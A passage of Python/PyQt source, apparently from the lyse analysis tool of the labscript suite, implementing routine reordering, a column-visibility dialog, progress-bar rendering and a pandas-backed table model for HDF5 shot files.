menu.addAction(self.action_restart_selected)
menu.addAction(self.action_remove_selected)
menu.exec_(QtGui.QCursor.pos())
def on_set_selected_triggered(self, active):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
for row in selected_rows:
active_item = self.model.item(row, self.COL_ACTIVE)
active_item.setCheckState(active)
self.update_select_all_checkstate()
def on_move_to_top_clicked(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
n = self.model.rowCount()
i_selected = 0
i_unselected = len(selected_rows)
order = []
for i in range(n):
if i in selected_rows:
order.append(i_selected)
i_selected += 1
else:
order.append(i_unselected)
i_unselected += 1
self.reorder(order)
def on_move_up_clicked(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
n = self.model.rowCount()
order = []
last_unselected_index = None
for i in range(n):
if i in selected_rows:
if last_unselected_index is None:
order.append(i)
else:
order.append(i - 1)
order[last_unselected_index] += 1
else:
last_unselected_index = i
order.append(i)
self.reorder(order)
def on_move_down_clicked(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
n = self.model.rowCount()
order = []
last_unselected_index = None
for i in reversed(range(n)):
if i in selected_rows:
if last_unselected_index is None:
order.insert(0, i)
else:
order.insert(0, i + 1)
order[last_unselected_index - n] -= 1
else:
last_unselected_index = i
order.insert(0, i)
self.reorder(order)
def on_move_to_bottom_clicked(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
n = self.model.rowCount()
i_selected = n - len(selected_rows)
i_unselected = 0
order = []
for i in range(n):
if i in selected_rows:
order.append(i_selected)
i_selected += 1
else:
order.append(i_unselected)
i_unselected += 1
self.reorder(order)
def on_restart_selected_triggered(self):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
name_items = [self.model.item(row, self.COL_NAME) for row in selected_rows]
filepaths = [item.data(self.ROLE_FULLPATH) for item in name_items]
for routine in self.routines:
if routine.filepath in filepaths:
routine.restart()
self.update_select_all_checkstate()
def analysis_loop(self):
while True:
filepath = self.from_filebox.get()
if self.multishot:
assert filepath is None
# TODO: get the filepath of the output h5 file:
# filepath = self.filechooserentry.get_text()
self.logger.info('got a file to process: %s'%filepath)
self.do_analysis(filepath)
def todo(self):
"""How many analysis routines are not done?"""
return len([r for r in self.routines if r.enabled() and not r.done])
def do_analysis(self, filepath):
"""Run all analysis routines once on the given filepath,
which is a shot file if we are a singleshot routine box"""
for routine in self.routines:
routine.set_status('clear')
remaining = self.todo()
error = False
updated_data = {}
while remaining:
self.logger.debug('%d routines left to do'%remaining)
for routine in self.routines:
if routine.enabled() and not routine.done:
break
else:
routine = None
if routine is not None:
self.logger.info('running analysis routine %s'%routine.shortname)
routine.set_status('working')
success, updated_data = routine.do_analysis(filepath)
if success:
routine.set_status('done')
self.logger.debug('success')
else:
routine.set_status('error')
self.logger.debug('failure')
error = True
break
# Race conditions here, but it's only for reporting percent done
# so it doesn't matter if it's wrong briefly:
remaining = self.todo()
total = len([r for r in self.routines if r.enabled()])
done = total - remaining
try:
status_percent = 100*float(done)/(remaining + done)
except ZeroDivisionError:
# All routines got deleted mid-analysis, we're done here:
status_percent = 100.0
self.to_filebox.put(['progress', status_percent, updated_data])
if error:
self.to_filebox.put(['error', None, updated_data])
else:
self.to_filebox.put(['done', 100.0, {}])
self.logger.debug('completed analysis of %s'%filepath)
def reorder(self, order):
assert len(order) == len(set(order)), 'ordering contains non-unique elements'
# Apply the reordering to the liststore:
for old_index, new_index in enumerate(order):
name_item = self.model.item(old_index, self.COL_NAME)
name_item.setData(new_index, self.ROLE_SORTINDEX)
self.ui.treeView.sortByColumn(self.COL_NAME, QtCore.Qt.AscendingOrder)
# Apply new order to our list of routines too:
self.routines = [self.routines[order.index(i)] for i in range(len(order))]
def update_select_all_checkstate(self):
with self.select_all_checkbox_state_changed_disconnected:
all_states = []
for row in range(self.model.rowCount()):
active_item = self.model.item(row, self.COL_ACTIVE)
all_states.append(active_item.checkState())
if all(state == QtCore.Qt.Checked for state in all_states):
self.select_all_checkbox.setCheckState(QtCore.Qt.Checked)
elif all(state == QtCore.Qt.Unchecked for state in all_states):
self.select_all_checkbox.setCheckState(QtCore.Qt.Unchecked)
else:
self.select_all_checkbox.setCheckState(QtCore.Qt.PartiallyChecked)
class EditColumnsDialog(QtWidgets.QDialog):
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
close_signal = Signal()
def __init__(self):
QtWidgets.QDialog.__init__(self, None, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint)
def event(self, event):
result = QtWidgets.QDialog.event(self, event)
if event.type() == QtCore.QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
def closeEvent(self, event):
self.close_signal.emit()
event.ignore()
class EditColumns(object):
ROLE_SORT_DATA = QtCore.Qt.UserRole + 1
COL_VISIBLE = 0
COL_NAME = 1
def __init__(self, filebox, column_names, columns_visible):
self.filebox = filebox
self.column_names = column_names.copy()
self.columns_visible = columns_visible.copy()
self.old_columns_visible = columns_visible.copy()
loader = UiLoader()
self.ui = loader.load(os.path.join(LYSE_DIR, 'edit_columns.ui'), EditColumnsDialog())
self.model = UneditableModel()
self.header = HorizontalHeaderViewWithWidgets(self.model)
self.select_all_checkbox = QtWidgets.QCheckBox()
self.select_all_checkbox.setTristate(False)
self.ui.treeView.setHeader(self.header)
self.proxy_model = QtCore.QSortFilterProxyModel()
self.proxy_model.setSourceModel(self.model)
self.proxy_model.setFilterCaseSensitivity(QtCore.Qt.CaseInsensitive)
self.proxy_model.setFilterKeyColumn(self.COL_NAME)
self.ui.treeView.setSortingEnabled(True)
self.header.setStretchLastSection(True)
self.proxy_model.setSortRole(self.ROLE_SORT_DATA)
self.ui.treeView.setModel(self.proxy_model)
self.ui.setWindowModality(QtCore.Qt.ApplicationModal)
self.ui.treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_set_selected_visible = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'Show selected columns', self.ui)
self.action_set_selected_hidden = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'Hide selected columns', self.ui)
self.connect_signals()
self.populate_model(column_names, self.columns_visible)
def connect_signals(self):
if os.name == 'nt':
self.ui.newWindow.connect(set_win_appusermodel)
self.ui.close_signal.connect(self.close)
self.ui.lineEdit_filter.textEdited.connect(self.on_filter_text_edited)
self.ui.pushButton_make_it_so.clicked.connect(self.make_it_so)
self.ui.pushButton_cancel.clicked.connect(self.cancel)
self.model.itemChanged.connect(self.on_model_item_changed)
# A context manager with which we can temporarily disconnect the above connection.
self.model_item_changed_disconnected = DisconnectContextManager(
self.model.itemChanged, self.on_model_item_changed)
self.select_all_checkbox.stateChanged.connect(self.on_select_all_state_changed)
self.select_all_checkbox_state_changed_disconnected = DisconnectContextManager(
self.select_all_checkbox.stateChanged, self.on_select_all_state_changed)
self.ui.treeView.customContextMenuRequested.connect(self.on_treeView_context_menu_requested)
self.action_set_selected_visible.triggered.connect(
lambda: self.on_set_selected_triggered(QtCore.Qt.Checked))
self.action_set_selected_hidden.triggered.connect(
lambda: self.on_set_selected_triggered(QtCore.Qt.Unchecked))
def populate_model(self, column_names, columns_visible):
self.model.clear()
self.model.setHorizontalHeaderLabels(['', 'Name'])
self.header.setWidget(self.COL_VISIBLE, self.select_all_checkbox)
self.ui.treeView.resizeColumnToContents(self.COL_VISIBLE)
# Which indices in self.columns_visible the row numbers correspond to
self.column_indices = {}
# Remove our special columns from the dict of column names by keeping only tuples:
column_names = {i: name for i, name in column_names.items() if isinstance(name, tuple)}
# Sort the column names as comma separated values, converting to lower case:
sortkey = lambda item: ', '.join(item[1]).lower().strip(', ')
for column_index, name in sorted(column_names.items(), key=sortkey):
visible = columns_visible[column_index]
visible_item = QtGui.QStandardItem()
visible_item.setCheckable(True)
if visible:
visible_item.setCheckState(QtCore.Qt.Checked)
visible_item.setData(QtCore.Qt.Checked, self.ROLE_SORT_DATA)
else:
visible_item.setCheckState(QtCore.Qt.Unchecked)
visible_item.setData(QtCore.Qt.Unchecked, self.ROLE_SORT_DATA)
name_as_string = ', '.join(name).strip(', ')
name_item = QtGui.QStandardItem(name_as_string)
name_item.setData(sortkey((column_index, name)), self.ROLE_SORT_DATA)
self.model.appendRow([visible_item, name_item])
self.column_indices[self.model.rowCount() - 1] = column_index
self.ui.treeView.resizeColumnToContents(self.COL_NAME)
self.update_select_all_checkstate()
self.ui.treeView.sortByColumn(self.COL_NAME, QtCore.Qt.AscendingOrder)
def on_treeView_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self.ui)
menu.addAction(self.action_set_selected_visible)
menu.addAction(self.action_set_selected_hidden)
menu.exec_(QtGui.QCursor.pos())
def on_set_selected_triggered(self, visible):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(self.proxy_model.mapToSource(index).row() for index in selected_indexes)
for row in selected_rows:
visible_item = self.model.item(row, self.COL_VISIBLE)
self.update_visible_state(visible_item, visible)
self.update_select_all_checkstate()
self.do_sort()
self.filebox.set_columns_visible(self.columns_visible)
def on_filter_text_edited(self, text):
self.proxy_model.setFilterWildcard(text)
def on_select_all_state_changed(self, state):
with self.select_all_checkbox_state_changed_disconnected:
# Do not allow a switch *to* a partially checked state:
self.select_all_checkbox.setTristate(False)
state = self.select_all_checkbox.checkState()
for row in range(self.model.rowCount()):
visible_item = self.model.item(row, self.COL_VISIBLE)
self.update_visible_state(visible_item, state)
self.do_sort()
self.filebox.set_columns_visible(self.columns_visible)
def update_visible_state(self, item, state):
assert item.column() == self.COL_VISIBLE, "unexpected column"
row = item.row()
with self.model_item_changed_disconnected:
item.setCheckState(state)
item.setData(state, self.ROLE_SORT_DATA)
if state == QtCore.Qt.Checked:
self.columns_visible[self.column_indices[row]] = True
else:
self.columns_visible[self.column_indices[row]] = False
def update_select_all_checkstate(self):
with self.select_all_checkbox_state_changed_disconnected:
all_states = []
for row in range(self.model.rowCount()):
visible_item = self.model.item(row, self.COL_VISIBLE)
all_states.append(visible_item.checkState())
if all(state == QtCore.Qt.Checked for state in all_states):
self.select_all_checkbox.setCheckState(QtCore.Qt.Checked)
elif all(state == QtCore.Qt.Unchecked for state in all_states):
self.select_all_checkbox.setCheckState(QtCore.Qt.Unchecked)
else:
self.select_all_checkbox.setCheckState(QtCore.Qt.PartiallyChecked)
def on_model_item_changed(self, item):
state = item.checkState()
self.update_visible_state(item, state)
self.update_select_all_checkstate()
self.do_sort()
self.filebox.set_columns_visible(self.columns_visible)
def do_sort(self):
header = self.ui.treeView.header()
sort_column = header.sortIndicatorSection()
sort_order = header.sortIndicatorOrder()
self.ui.treeView.sortByColumn(sort_column, sort_order)
def update_columns(self, column_names, columns_visible):
# Index/name mapping may have changed. Get a mapping by *name* of
# which columns were previously visible, so we can update our by-index
# mapping in a moment:
old_columns_visible_by_name = {}
for old_column_number, visible in self.old_columns_visible.items():
column_name = self.column_names[old_column_number]
old_columns_visible_by_name[column_name] = visible
self.columns_visible = columns_visible.copy()
self.column_names = column_names.copy()
# Update the by-index mapping of which columns were visible before editing:
self.old_columns_visible = {}
for index, name in self.column_names.items():
try:
self.old_columns_visible[index] = old_columns_visible_by_name[name]
except KeyError:
# A new column. If editing is cancelled, any new columns
# should be set to visible:
self.old_columns_visible[index] = True
self.populate_model(column_names, self.columns_visible)
def show(self):
self.old_columns_visible = self.columns_visible.copy()
self.ui.show()
def close(self):
self.columns_visible = self.old_columns_visible.copy()
self.filebox.set_columns_visible(self.columns_visible)
self.populate_model(self.column_names, self.columns_visible)
self.ui.hide()
def cancel(self):
self.ui.close()
def make_it_so(self):
self.ui.hide()
class ItemDelegate(QtWidgets.QStyledItemDelegate):
"""An item delegate with a fixed height and a progress bar in one column"""
EXTRA_ROW_HEIGHT = 2
def __init__(self, view, model, col_status, role_status_percent):
self.view = view
self.model = model
self.COL_STATUS = col_status
self.ROLE_STATUS_PERCENT = role_status_percent
QtWidgets.QStyledItemDelegate.__init__(self)
def sizeHint(self, *args):
fontmetrics = QtGui.QFontMetrics(self.view.font())
text_height = fontmetrics.height()
row_height = text_height + self.EXTRA_ROW_HEIGHT
size = QtWidgets.QStyledItemDelegate.sizeHint(self, *args)
return QtCore.QSize(size.width(), row_height)
def paint(self, painter, option, index):
if index.column() == self.COL_STATUS:
status_percent = self.model.data(index, self.ROLE_STATUS_PERCENT)
if status_percent == 100:
# Render as a normal item - this shows whatever icon is set instead of a progress bar.
return QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
else:
# Method of rendering a progress bar into the view copied from
# Qt's 'network-torrent' example:
# http://qt-project.org/doc/qt-4.8/network-torrent-torrentclient-cpp.html
# Set up a QStyleOptionProgressBar to precisely mimic the
# environment of a progress bar.
progress_bar_option = QtWidgets.QStyleOptionProgressBar()
progress_bar_option.state = QtWidgets.QStyle.State_Enabled
progress_bar_option.direction = qapplication.layoutDirection()
progress_bar_option.rect = option.rect
progress_bar_option.fontMetrics = qapplication.fontMetrics()
progress_bar_option.minimum = 0
progress_bar_option.maximum = 100
progress_bar_option.textAlignment = QtCore.Qt.AlignCenter
progress_bar_option.textVisible = True
# Set the progress and text values of the style option.
progress_bar_option.progress = status_percent
progress_bar_option.text = '%d%%' % status_percent
# Draw the progress bar onto the view.
qapplication.style().drawControl(QtWidgets.QStyle.CE_ProgressBar, progress_bar_option, painter)
else:
return QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
class UneditableModel(QtGui.QStandardItemModel):
def flags(self, index):
"""Return flags as normal except that the ItemIsEditable
flag is always False"""
result = QtGui.QStandardItemModel.flags(self, index)
return result & ~QtCore.Qt.ItemIsEditable
class TableView(QtWidgets.QTableView):
leftClicked = Signal(QtCore.QModelIndex)
doubleLeftClicked = Signal(QtCore.QModelIndex)
"""A QTableView that emits a custom signal leftClicked(index) after a left
click on a valid index, and doubleLeftClicked(index) (in addition) on
double click. Multiple inheritance of QObjects is not possible, so we
are forced to duplicate code instead of sharing code with the extremely
similar TreeView class in this module"""
def __init__(self, *args):
QtWidgets.QTableView.__init__(self, *args)
self._pressed_index = None
self._double_click = False
def mousePressEvent(self, event):
result = QtWidgets.QTableView.mousePressEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
return result
def leaveEvent(self, event):
result = QtWidgets.QTableView.leaveEvent(self, event)
self._pressed_index = None
self._double_click = False
return result
def mouseDoubleClickEvent(self, event):
# Ensure our left click event occurs regardless of whether it is the
# second click in a double click or not
result = QtWidgets.QTableView.mouseDoubleClickEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
self._double_click = True
return result
def mouseReleaseEvent(self, event):
result = QtWidgets.QTableView.mouseReleaseEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid() and index == self._pressed_index:
self.leftClicked.emit(index)
if self._double_click:
self.doubleLeftClicked.emit(index)
self._pressed_index = None
self._double_click = False
return result
class DataFrameModel(QtCore.QObject):
COL_STATUS = 0
COL_FILEPATH = 1
ROLE_STATUS_PERCENT = QtCore.Qt.UserRole + 1
ROLE_DELETED_OFF_DISK = QtCore.Qt.UserRole + 2
columns_changed = Signal()
def __init__(self, view, exp_config):
QtCore.QObject.__init__(self)
self._view = view
self.exp_config = exp_config
self._model = UneditableModel()
self.row_number_by_filepath = {}
self._previous_n_digits = 0
self._header = HorizontalHeaderViewWithWidgets(self._model)
self._vertheader = QtWidgets.QHeaderView(QtCore.Qt.Vertical)
self._vertheader.setSectionResizeMode(QtWidgets.QHeaderView.Fixed)
# Smaller font for headers:
font = self._vertheader.font()
font.setPointSize(10 if sys.platform == 'darwin' else 8)
self._header.setFont(font)
font.setFamily('Ubuntu Mono')
self._vertheader.setFont(font)
self._vertheader.setHighlightSections(True)
self._vertheader.setSectionsClickable(True)
self._view.setModel(self._model)
self._view.setHorizontalHeader(self._header)
self._view.setVerticalHeader(self._vertheader)
self._delegate = ItemDelegate(self._view, self._model, self.COL_STATUS, self.ROLE_STATUS_PERCENT)
self._view.setItemDelegate(self._delegate)
self._view.setSelectionBehavior(QtWidgets.QTableView.SelectRows)
self._view.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Check if integer indexing is to be used
try:
self.integer_indexing = self.exp_config.getboolean('lyse', 'integer_indexing')
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
self.integer_indexing = False
# This dataframe will contain all the scalar data
# from the shot files that are currently open:
index = pandas.MultiIndex.from_tuples([('filepath', '')])
self.dataframe = pandas.DataFrame({'filepath': []}, columns=index)
# How many levels the dataframe's multiindex has:
self.nlevels = self.dataframe.columns.nlevels
status_item = QtGui.QStandardItem()
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/information'))
status_item.setToolTip('status/progress of single-shot analysis')
self._model.setHorizontalHeaderItem(self.COL_STATUS, status_item)
filepath_item = QtGui.QStandardItem('filepath')
filepath_item.setToolTip('filepath')
self._model.setHorizontalHeaderItem(self.COL_FILEPATH, filepath_item)
self._view.setColumnWidth(self.COL_STATUS, 70)
self._view.setColumnWidth(self.COL_FILEPATH, 100)
# Column indices to names and vice versa for fast lookup:
self.column_indices = {'__status': self.COL_STATUS, ('filepath', ''): self.COL_FILEPATH}
self.column_names = {self.COL_STATUS: '__status', self.COL_FILEPATH: ('filepath', '')}
self.columns_visible = {self.COL_STATUS: True, self.COL_FILEPATH: True}
# Whether or not a deleted column was visible at the time it was deleted (by name):
self.deleted_columns_visible = {}
# Make the actions for the context menu:
self.action_remove_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/minus'), 'Remove selected shots', self._view)
self.connect_signals()
def connect_signals(self):
self._view.customContextMenuRequested.connect(self.on_view_context_menu_requested)
self.action_remove_selected.triggered.connect(self.on_remove_selection)
def on_remove_selection(self):
self.remove_selection()
def remove_selection(self, confirm=True):
selection_model = self._view.selectionModel()
selected_indexes = selection_model.selectedRows()
selected_name_items = [self._model.itemFromIndex(index) for index in selected_indexes]
if not selected_name_items:
return
if confirm and not question_dialog("Remove %d shots?" % len(selected_name_items)):
return
# Remove from DataFrame first:
self.dataframe = self.dataframe.drop(index.row() for index in selected_indexes)
self.dataframe.index = pandas.Index(range(len(self.dataframe)))
# Delete one at a time from Qt model:
for name_item in selected_name_items:
row = name_item.row()
self._model.removeRow(row)
self.renumber_rows()
def mark_selection_not_done(self):
selected_indexes = self._view.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
for row in selected_rows:
status_item = self._model.item(row, self.COL_STATUS)
if status_item.data(self.ROLE_DELETED_OFF_DISK):
# If the shot was previously not readable on disk, check to
# see if it's readable now. It may have been undeleted or
# perhaps it being unreadable before was due to a network
# glitch or similar.
filepath = self._model.item(row, self.COL_FILEPATH).text()
if not os.path.exists(filepath):
continue
# Shot file is accesible again:
status_item.setData(False, self.ROLE_DELETED_OFF_DISK)
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/tick'))
status_item.setToolTip(None)
status_item.setData(0, self.ROLE_STATUS_PERCENT)
def on_view_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self._view)
menu.addAction(self.action_remove_selected)
menu.exec_(QtGui.QCursor.pos())
def on_double_click(self, index):
filepath_item = self._model.item(index.row(), self.COL_FILEPATH)
shot_filepath = filepath_item.text()
# get path to text editor
viewer_path = self.exp_config.get('programs', 'hdf5_viewer')
viewer_args = self.exp_config.get('programs', 'hdf5_viewer_arguments')
# Get the current labscript file:
if not viewer_path:
error_dialog("No hdf5 viewer specified in the labconfig.")
if '{file}' in viewer_args:
# Split the args on spaces into a list, replacing {file} with the labscript file
viewer_args = [arg if arg != '{file}' else shot_filepath for arg in viewer_args.split()]
else:
# Otherwise if {file} isn't already in there, append it to the other args:
viewer_args = [shot_filepath] + viewer_args.split()
try:
subprocess.Popen([viewer_path] + viewer_args)
except Exception as e:
error_dialog("Unable to launch hdf5 viewer specified in %s. Error was: %s" %
(self.exp_config.config_path, str(e)))
def set_columns_visible(self, columns_visible):
self.columns_visible = columns_visible
for column_index, visible in columns_visible.items():
self._view.setColumnHidden(column_index, not visible)
def update_column_levels(self):
"""Pads the keys and values of our lists of column names so that
they still match those in the dataframe after the number of
levels in its multiindex has increased"""
extra_levels = self.dataframe.columns.nlevels - self.nlevels
if extra_levels > 0:
self.nlevels = self.dataframe.columns.nlevels
column_indices = {}
column_names = {}
for column_name in self.column_indices:
if not isinstance(column_name, tuple):
# It's one of our special columns
new_column_name = column_name
else:
new_column_name = column_name + ('',) * extra_levels
column_index = self.column_indices[column_name]
column_indices[new_column_name] = column_index
column_names[column_index] = new_column_name
self.column_indices = column_indices
self.column_names = column_names
@inmain_decorator()
def mark_as_deleted_off_disk(self, filepath):
# Confirm the shot hasn't been removed from lyse (we are in the main
# thread so there is no race condition in checking first)
if not filepath in self.dataframe['filepath'].values:
# Shot has been removed from FileBox, nothing to do here:
return
row_number = self.row_number_by_filepath[filepath]
status_item = self._model.item(row_number, self.COL_STATUS)
already_marked_as_deleted = status_item.data(self.ROLE_DELETED_OFF_DISK)
if already_marked_as_deleted:
return
# Icon only displays if percent completion is 100. This is also
# important so that the shot is not picked up as analysis
# incomplete and analysis re-attempted on it.
status_item.setData(True, self.ROLE_DELETED_OFF_DISK)
status_item.setData(100, self.ROLE_STATUS_PERCENT)
status_item.setToolTip("Shot has been deleted off disk or is unreadable")
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/drive--minus'))
app.output_box.output('Warning: Shot deleted from disk or no longer readable %s\n' % filepath, red=True)
@inmain_decorator()
def update_row(self, filepath, dataframe_already_updated=False, status_percent=None, new_row_data=None, updated_row_data=None):
""""Updates a row in the dataframe and Qt model
to the data in the HDF5 file for that shot. Also sets the percent done, if specified"""
# To speed things up block signals to the model during update
self._model.blockSignals(True)
# Update the row in the dataframe first:
if (new_row_data is None) == (updated_row_data is None) and not dataframe_already_updated:
raise ValueError('Exactly one of new_row_data or updated_row_data must be provided')
try:
row_number = self.row_number_by_filepath[filepath]
except KeyError:
# Row has been deleted, nothing to do here:
return
filepath_colname = ('filepath',) + ('',) * (self.nlevels - 1)
assert filepath == self.dataframe.at[row_number, filepath_colname]
if updated_row_data is not None and not dataframe_already_updated:
for group, name in updated_row_data:
column_name = (group, name) + ('',) * (self.nlevels - 2)
value = updated_row_data[group, name]
try:
self.dataframe.at[row_number, column_name] = value
except ValueError:
# did the column not already exist when we tried to set an iterable?
if not column_name in self.dataframe.columns:
# create it with a non-iterable and then overwrite with the iterable value:
self.dataframe.at[row_number, column_name] = None
else:
# Incompatible datatype - convert the datatype of the column to
# 'object'
self.dataframe[column_name] = self.dataframe[column_name].astype('object')
# Now that the column exists and has dtype object, we can set the value:
self.dataframe.at[row_number, column_name] = value
dataframe_already_updated = True
if not dataframe_already_updated:
if new_row_data is None:
raise ValueError("If dataframe_already_updated is False, then new_row_data, as returned "
"by dataframe_utils.get_dataframe_from_shot(filepath) must be provided.")
self.dataframe = replace_with_padding(self.dataframe, new_row_data, row_number)
self.update_column_levels()
# Check and create necessary new columns in the Qt model:
new_column_names = set(self.dataframe.columns) - set(self.column_names.values())
new_columns_start = self._model.columnCount()
self._model.insertColumns(new_columns_start, len(new_column_names))
for i, column_name in enumerate(sorted(new_column_names)):
# Set the header label of the new column:
column_number = new_columns_start + i
self.column_names[column_number] = column_name
self.column_indices[column_name] = column_number
if column_name in self.deleted_columns_visible:
# Restore the former visibility of this column if we've
# seen one with its name before:
visible = self.deleted_columns_visible[column_name]
self.columns_visible[column_number] = visible
self._view.setColumnHidden(column_number, not visible)
else:
# new columns are visible by default:
self.columns_visible[column_number] = True
column_name_as_string = '\n'.join(column_name).strip()
header_item = QtGui.QStandardItem(column_name_as_string)
header_item.setToolTip(column_name_as_string)
self._model.setHorizontalHeaderItem(column_number, header_item)
# Check and remove any no-longer-needed columns in the Qt model:
defunct_column_names = (set(self.column_names.values()) - set(self.dataframe.columns)
- {self.column_names[self.COL_STATUS], self.column_names[self.COL_FILEPATH]})
defunct_column_indices = [self.column_indices[column_name] for column_name in defunct_column_names]
for column_number in sorted(defunct_column_indices, reverse=True):
# Remove columns from the Qt model. In reverse order so that
# removals do not change the position of columns yet to be
# removed.
self._model.removeColumn(column_number)
# Save whether or not the column was visible when it was
# removed (so that if it is re-added the visibility will be retained):
self.deleted_columns_visible[self.column_names[column_number]] = self.columns_visible[column_number]
del self.column_names[column_number]
del self.columns_visible[column_number]
if defunct_column_indices:
# Renumber the keys of self.columns_visible and self.column_names to reflect deletions:
self.column_names = {newindex: name for newindex, (oldindex, name) in enumerate(sorted(self.column_names.items()))}
self.columns_visible = {newindex: visible for newindex, (oldindex, visible) in enumerate(sorted(self.columns_visible.items()))}
# Update the inverse mapping of self.column_names:
self.column_indices = {name: index for index, name in self.column_names.items()}
# Update the data in the Qt model:
dataframe_row = self.dataframe.iloc[row_number].to_dict()
for column_number, column_name in self.column_names.items():
if not isinstance(column_name, tuple):
# One of our special columns, does not correspond to a column in the dataframe:
continue
if updated_row_data is not None and column_name not in updated_row_data:
continue
value = dataframe_row[column_name]
if isinstance(value, float):
value_str = scientific_notation(value)
else:
value_str = str(value)
lines = value_str.splitlines()
if len(lines) > 1:
short_value_str = lines[0] + ' ...'
else:
short_value_str = value_str
item = self._model.item(row_number, column_number)
if item is None:
# This is the first time we've written a value to this part of the model:
item = QtGui.QStandardItem(short_value_str)
item.setData(QtCore.Qt.AlignCenter, QtCore.Qt.TextAlignmentRole)
self._model.setItem(row_number, column_number, item)
else:
item.setText(short_value_str)
item.setToolTip(repr(value))
for i, column_name in enumerate(sorted(new_column_names)):
# Resize any new columns to fit contents:
column_number = new_columns_start + i
self._view.resizeColumnToContents(column_number)
if status_percent is not None:
status_item = self._model.item(row_number, self.COL_STATUS)
status_item.setData(status_percent, self.ROLE_STATUS_PERCENT)
if new_column_names or defunct_column_names:
self.columns_changed.emit()
# unblock signals to the model and tell it to update
self._model.blockSignals(False)
self._model.layoutChanged.emit()
def new_row(self, filepath, done=False):
status_item = QtGui.QStandardItem()
if done:
status_item.setData(100, self.ROLE_STATUS_PERCENT)
status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/tick'))
else:
status_item.setData(0, self.ROLE_STATUS_PERCENT)
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/tick'))
name_item = QtGui.QStandardItem(filepath)
return [status_item, name_item]
def renumber_rows(self, add_from=0):
"""Add/update row indices - the rows are numbered in simple sequential
order for easy comparison with the dataframe. add_from allows you to
only add numbers for new rows from the given index as a performance
optimisation, though if the number of digits changes, all rows will
still be renumbered. add_from should not be used if rows have been
deleted."""
n_digits = len(str(self._model.rowCount()))
if n_digits != self._previous_n_digits:
# All labels must be updated:
add_from = 0
self._previous_n_digits = n_digits
if add_from == 0:
self.row_number_by_filepath = {}
for row_number in range(add_from, self._model.rowCount()):
vertical_header_item = self._model.verticalHeaderItem(row_number)
row_number_str = str(row_number).rjust(n_digits)
vert_header_text = '{}. '.format(row_number_str)
filepath_item = self._model.item(row_number, self.COL_FILEPATH)
filepath = filepath_item.text()
self.row_number_by_filepath[filepath] = row_number
if self.integer_indexing:
header_cols = ['sequence_index', 'run number', 'run repeat']
header_strings = []
for col in header_cols:
val = self.dataframe[col].values[row_number]
if pandas.notna(val):
header_strings.append('{:04d}'.format(val))
else:
header_strings.append('----')
vert_header_text += ' | '.join(header_strings)
else:
basename = os.path.splitext(os.path.basename(filepath))[0]
vert_header_text += basename
vertical_header_item.setText(vert_header_text)
@inmain_decorator()
def add_files(self, filepaths, new_row_data, done=False):
"""Add files to the dataframe model. New_row_data should be a
dataframe containing the new rows."""
to_add = []
# Check for duplicates:
for filepath in filepaths:
if filepath in self.row_number_by_filepath or filepath in to_add:
app.output_box.output('Warning: Ignoring duplicate shot %s\n' % filepath, red=True)
if new_row_data is not None:
df_row_index = np.where(new_row_data['filepath'].values == filepath)
new_row_data = new_row_data.drop(df_row_index[0])
new_row_data.index = pandas.Index(range(len(new_row_data)))
else:
to_add.append(filepath)
assert len(new_row_data) == len(to_add)
if to_add:
# Update the dataframe:
self.dataframe = concat_with_padding(self.dataframe, new_row_data)
self.update_column_levels()
app.filebox.set_add_shots_progress(None, None, "updating filebox")
for filepath in to_add:
# Add the new rows to the Qt model:
self._model.appendRow(self.new_row(filepath, done=done))
vert_header_item = QtGui.QStandardItem('...loading...')
self._model.setVerticalHeaderItem(self._model.rowCount() - 1, vert_header_item)
self._view.resizeRowToContents(self._model.rowCount() - 1)
self.renumber_rows(add_from=self._model.rowCount()-len(to_add))
# Update the Qt model:
for filepath in to_add:
self.update_row(filepath, dataframe_already_updated=True)
@inmain_decorator()
def get_first_incomplete(self):
"""Returns the filepath of the first shot in the model that has not
been analysed"""
for row in range(self._model.rowCount()):
status_item = self._model.item(row, self.COL_STATUS)
if status_item.data(self.ROLE_STATUS_PERCENT) != 100:
filepath_item = self._model.item(row, self.COL_FILEPATH)
return filepath_item.text()
class FileBox(object):
def __init__(self, container, exp_config, to_singleshot, from_singleshot, to_multishot, from_multishot):
self.exp_config = exp_config
self.to_singleshot = to_singleshot
self.to_multishot = to_multishot
self.from_singleshot = from_singleshot
self.from_multishot = from_multishot
self.logger = logging.getLogger('lyse.FileBox')
self.logger.info('starting')
loader = UiLoader()
loader.registerCustomWidget(TableView)
self.ui = loader.load(os.path.join(LYSE_DIR, 'filebox.ui'))
